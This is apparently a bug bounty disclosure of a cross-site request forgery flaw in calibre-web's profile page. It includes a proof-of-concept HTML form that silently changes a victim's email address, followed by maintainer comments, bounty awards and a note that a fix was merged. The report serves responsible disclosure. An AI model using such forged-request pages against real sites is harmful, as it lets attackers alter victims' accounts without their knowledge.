Cross-Site Request Forgery (CSRF) in janeczku/calibre-web

Valid

Reported on

Jul 23rd 2021


✍️ Description

An attacker can make a user change his profile settings by CSRF vulnerability through PoC file. There is no CSRF token.

🕵️‍♂️ Proof of Concept

For example, changing the email address from "test1@test.com" to "test1@test.comm" (test1's profile). Make the user open a link with this page poc.html:

// PoC.html
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost:8083/me" method="POST">
      <input type="hidden" name="email" value="test1&#64;test&#46;comm" />
      <input type="hidden" name="kindle&#95;mail" value="" />
      <input type="hidden" name="locale" value="en" />
      <input type="hidden" name="default&#95;language" value="all" />
      <input type="hidden" name="show&#95;16" value="on" />
      <input type="hidden" name="show&#95;65536" value="on" />
      <input type="hidden" name="show&#95;128" value="on" />
      <input type="hidden" name="show&#95;256" value="on" />
      <input type="hidden" name="show&#95;32" value="on" />
      <input type="hidden" name="show&#95;8" value="on" />
      <input type="hidden" name="show&#95;4" value="on" />
      <input type="hidden" name="show&#95;64" value="on" />
      <input type="hidden" name="show&#95;4096" value="on" />
      <input type="hidden" name="show&#95;2" value="on" />
      <input type="hidden" name="show&#95;8192" value="on" />
      <input type="hidden" name="show&#95;16384" value="on" />
      <input type="hidden" name="show&#95;32768" value="on" />
      <input type="hidden" name="show&#95;131072" value="on" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

💥 Impact

This vulnerability is capable of allow unwanted actions and changes in the profile of a user who didn't notice the hidden intention.

We have contacted a member of the janeczku/calibre-web team and are waiting to hear back a year ago
Ozzie Isaacs
a year ago

@admin: I can't tag this issue as valid (lost the magic link email or whatever)

Jamie Slome
a year ago

Admin


Marking as valid as a maintainer has requested for it to be marked accordingly.

Jamie Slome validated this vulnerability a year ago
Ileana Barrionuevo has been awarded the disclosure bounty
The fix bounty is now up for grabs
Jamie Slome confirmed that a fix has been merged on 50919d 10 months ago
Ozzie Isaacs has been awarded the fix bounty
Jamie Slome
10 months ago

Admin


For the record, I have rewarded the fix bounty to the maintainer (OzzieIsaacs), where it was previously dropped.

to join this conversation